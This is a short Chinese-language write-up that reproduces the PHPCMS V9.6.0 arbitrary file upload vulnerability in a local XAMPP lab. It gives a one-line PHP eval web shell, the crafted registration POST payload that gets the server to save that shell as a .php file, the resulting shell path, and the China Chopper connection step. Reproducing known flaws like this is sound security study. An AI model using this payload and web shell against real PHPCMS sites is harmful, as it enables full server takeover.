### 漏洞复现 使用XAMPP搭建好环境，接着安装PHPCMS V9.6.0。 [PHPCMS V9.6.0 官方下载地址](http://bbs.phpcms.cn/thread-933447-1-1.html) 在phpcms根目录下写入一句话木马的txt记事本文件： ```<?php @eval($_POST['shell0']);?>```  路径为： http://localhost/phpcms/shell.txt  此时是txt记事本文件，解释器解析不了里面的PHP代码，所以用菜刀连接失败。  打开主页找到注册页面，填写基本信息，提交用burpsuite抓包：   send to repeater: 修改request 请求包的payload： ``` siteid=1&modelid=1&username=usera&password=password&pwdconfirm=password&email=usera%40test.com&nickname=nichenga&info[content]=href=http://localhost/phpcms/shell.txt?.php#.jpg&dosubmit=1&protocol= ```  response标黄的部分就是返回的shell地址，注意上面我们抓取的modelid值原本为10，payload改成了数字1，目的就是为了在response中显示shell路径。 ``` http://localhost/phpcms/uploadfile/2018/0403/20180403044429440.php ``` 这个路径的文件就是PHP一句话小马：  用菜刀连接成功：  ### 注：用PHP7版本测试上面的一句话木马是连接不了的，使用PHP5可以连接成功。 漏洞分析参考p0wd3r的[PHPCMS v9.6.0 任意文件上传漏洞分析](https://www.seebug.org/vuldb/ssvid-92930)